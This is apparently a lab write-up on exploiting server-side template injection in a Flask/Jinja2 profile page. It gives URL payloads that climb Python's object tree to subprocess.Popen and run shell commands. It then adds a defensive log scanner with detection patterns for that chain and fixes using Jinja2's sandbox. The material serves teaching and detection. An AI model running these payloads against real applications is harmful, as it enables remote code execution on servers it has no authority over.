Exploitation

So now we know the following:

  • The application is vulnerable to SSTI

  • The injection point

  • The template engine

  • The template engine syntax

Since Jinja2 is a Python-based template engine, we will look at ways to run shell commands from Python.

http://10.10.39.6:5000/profile/{% import os %}{{ os.system("whoami") }}

The above payload fails because Jinja2 is essentially a sub-language of Python that does not support the import statement inside its statement blocks.

Python lets us reach the class of any object through .__class__, and we can call this on an empty string. Classes in Python have an attribute called .__mro__ that lets us climb the inheritance tree; since we want the root object class, we access the second entry, .__mro__[1].

Classes in Python have a method called .__subclasses__() that lets us climb back down the object tree.

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()}}

Everything's set! Now we just have to find a class that allows us to run shell commands.

If we look closely, the output displayed is just a Python list, so we can access any entry by its index.

We can find the subprocess.Popen class in the dump and access it by its index, which is 401 in this case (the index varies between Python versions and environments, so it has to be read from the dump), so our payload now looks like this:

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()[401]}}

The above payload references the subprocess.Popen class; now all we have to do is invoke it:

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()[401] ("whoami", shell=True, stdout=-1).communicate() }}
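The defender's view of the same chain: the dunder attributes that climb from str to object and back down are a distinctive signature in web access logs. The following scanner is an added example, not part of the original writeup; the log lines are constructed, and it double URL-decodes paths because the braces and quotes in these payloads usually arrive percent-encoded.

```python
import re
from urllib.parse import unquote

# A Jinja2 expression or statement block, and the dunder attributes used by
# the gadget chain above (plus the usual neighbours of that chain).
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
DUNDER_CHAIN = re.compile(r"__(class|mro|subclasses|globals|builtins|import)__")

# Parses the request part of a common/combined-format access log line.
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log (the hosts and timestamps are made up); the second
# and third lines carry the payloads discussed above, one of them URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /profile/alice HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /profile/{{''.__class__.__mro__[1].__subclasses__()}} HTTP/1.1" 200 9120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /profile/%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%5B401%5D%7D%7D HTTP/1.1" 200 170
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /profile/{{7*7}} HTTP/1.1" 200 128
"""


def classify_request(raw_path: str) -> str:
    """Return 'gadget-chain', 'template-expr' or 'clean' for one request path."""
    path = unquote(unquote(raw_path))  # decode twice to catch %25-nested encoding
    has_expr = TEMPLATE_EXPR.search(path) is not None
    if has_expr and DUNDER_CHAIN.search(path):
        return "gadget-chain"      # object-walking chain: treat as attempted RCE
    if has_expr:
        return "template-expr"     # bare template syntax: probing for SSTI
    return "clean"


def scan_log(text: str) -> list:
    """Return (client, path, verdict) for every non-clean request in a log."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group("path"))
        if verdict != "clean":
            hits.append((line.split()[0], m.group("path"), verdict))
    return hits


if __name__ == "__main__":
    for client, path, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:14} {client:10} {path}")
```

A "gadget-chain" hit against a route that reflects user input into a template is the strongest signal here; the real fix is to never build templates from request data (pass it as a context variable instead) or to render with Jinja2's SandboxedEnvironment, which refuses access to underscore-prefixed attributes such as __class__.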
